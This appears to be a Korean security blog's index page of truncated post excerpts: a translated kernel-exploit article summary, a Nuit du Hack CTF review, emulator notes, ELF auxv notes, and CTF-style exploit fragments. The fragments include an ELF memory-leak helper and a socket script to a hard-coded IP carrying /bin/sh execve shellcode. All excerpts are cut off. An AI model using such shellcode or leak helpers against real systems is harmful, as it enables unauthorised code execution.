잡식창고

원문 링크: http://labs.lastline.com/unmasking-kernel-exploits 커널 익스플로잇 정체 알아내기 (Unmasking Kernel Exploits)저자: Roman Vasilenko 많은 수의 알려진 APT 공격과 국가 수준의 공격이 정교한 말웨어(Turla, Duqu, Equation Group, Duqu2, 등등)을 사용한다. 이 말웨어들은 Microsoft Windows 운영체제의 커널 안에서 돌아가는 하나 이상의 구성요소를 가지고 사용한다. 그 말웨어들은 보안 솔루션들로부터 숨겨진 상태를 유지하며, 공격자의 악의적인 목표를 성취하기 위해 컴퓨터 시스템의 가장 높은 권한을 탈취할 수 있다. OS 커널 안에서 실행될 수 있는 능력을 이용해서, 악의적인 코드들은 자동..

음.. 일단 제목을 정정하겠습니다. private CTF보다는 semi-private CTF가 낫겠네요. 운영상 상당히 아쉬운점이었습니다. 뒤에서 다시 언급하겠습니다. 이번 Nuit du Hack CTF는 예선, 본선으로 나뉘어 대회가 진행되었었는데요, 저는 한국인이라서 한국팀으로 나갔습니다. 예선이 4월 4일부터 4월 5일까지 24시간동안 진행되었구요, 저희 팀은 본선에 진출해서 6월 20일부터 21날에 있는 Nuit du Hack 2015의 private CTF(본선)에 참가하게 되었습니다. 예선은 퀴즈 형식으로 진행되었는데요, 이건 그럭저럭 작년이나 재작년이랑 형식이 같고 딱히 특징적인 부분은 없었습니다. 음.. 하나 특징적인 부분이라면 문제에 게싱, 그러니까 좋게말하면 추리문제가 조금 있었는데....

simavr에는 이미 UART랑 pty랑 연결시켜주는 기능이 있..어요! examples/parts 폴더에 있어요.하지만 이걸 소스코드에서 따로 안쓰고 있답니다! (예제에는 이걸 어떻게 쓰는 지 나와있어요.) 이걸 쓰는 방법은 examples/board_simduino의 simduino.c에 있었어요. 분석해봅시다! examples/board_simduino/simduino.c42:#include "uart_pty.h"48:uart_pty_t uart_pty;188:uart_pty_stop(&uart_pty);242:uart_pty_init(avr, &uart_pty);243:uart_pty_connect(&uart_pty, '0'); 오! 짱쉽네요! 이것만 해주면 되는거였어요! (uart_pty_con..

import struct p8 = lambda x: struct.pack("

http://jsbin.com/ganoraforohttp://jsbin.com/ganoraforo/1/edit 대충 짜봤는데 jsbin같은곳에 올리는건 처음이라.. iframe에다가 소스코드 넣고 document.write를 iframe이 담긴 문서에서 해주는 방식이다.같은 주소에 해주기 때문에 Cross-XHR같은건 안걸린다.단, 주소 끝에 ?test_it을 붙여서 문서 상자에 아무것도 뜨지 않게 해놨다.

던진다! 사용법:elf = elfleak(leak=특정 메모리를 몇 사이즈만큼 leak해서 str 형식으로 리턴해주는 함수) import struct p4 = lambda x: struct.pack(">L", x)u4 = lambda x: struct.unpack(">L", x)[0] class elfleak:leak = lambda x: xelf_got_dynamic = Falseelf_dynamic = -1base = -1sections = {}def __init__(self, *args, **kwargs):print kwargsif 'leak' in kwargs:self.leak = kwargs['leak']def get_elf(self, start):pages = 0; start &= 0xffff..

from socket import *from struct import * CRC_TABLE = ( 0x00000000L, 0xf26b8303L, 0xe13b70f7L, 0x1350f3f4L, 0xc79a971fL, 0x35f1141cL, 0x26a1e7e8L, 0xd4ca32ebL, 0x8ad958cfL, 0x78b2dbccL, 0x6be22838L, 0x9989ab3bL, 0x4d43cfd0L, 0xbf284cd3L, 0xac78bf27L, 0x5e133c24L, 0x105ec76fL, 0xe235446cL, 0xf165b798L, 0x030e349bL, 0xd7c45070L, 0x25afd373L, 0x36ff2087L, 0xc494a384L, 0x9a879fa0L, 0x68ec1ca3L, 0x7bb..

from socket import *from struct import *# Initialisation# 32 first bits of generator polynomial for CRC64# the 32 lower bits are assumed to be zero CRCTable = [0, 12911341560706588527L, 17619267392293085275L, 5164075066763771700L, 8921845837811637811L, 14483170935171449180L, 10328150133527543400L, 4357999468653093127L, 17843691675623275622L, 4940391307328217865L, 226782375002905661L, 12685511915..

넵사실 ld.so의 주소를 leak하는거구요.하지만 간격은 거의 같으니까요, 아니면 0x1000 단위로 브포해도 되구요. ELF의 엔트리포인트의 스택을 보면 이렇습니다. argc argv + envp 포인터들 auxv 키-값 배열 argv, envp 문자열 값 요렇습니다.주목할 건 auxv입니다. auxv는 Auxiliary Vectors의 줄임말이구요.http://articles.manugarg.com/aboutelfauxiliaryvectors.html 보시면 됩니다. 나중에 보셔도 되여. /proc/[PID]/auxv 파일을 xxd 파일로 보죠.32비트 프로세스입니다. bob_121@ubuntu:~$ xxd /proc/$$/auxv0000000: 2000 0000 14d4 fdb7 2100 0000..

from socket import *from telnetlib import Telnet s = socket(AF_INET, SOCK_STREAM)s.connect(('125.131.189.30',8888)) execve="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69""\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" def expect(t): d = '' while t not in d: d += s.recv(1) print d return d def add_phone(name, phone): s.send("1\n") expect("Name : \n") s.send(name) expect("Phone Number : \n") s.s..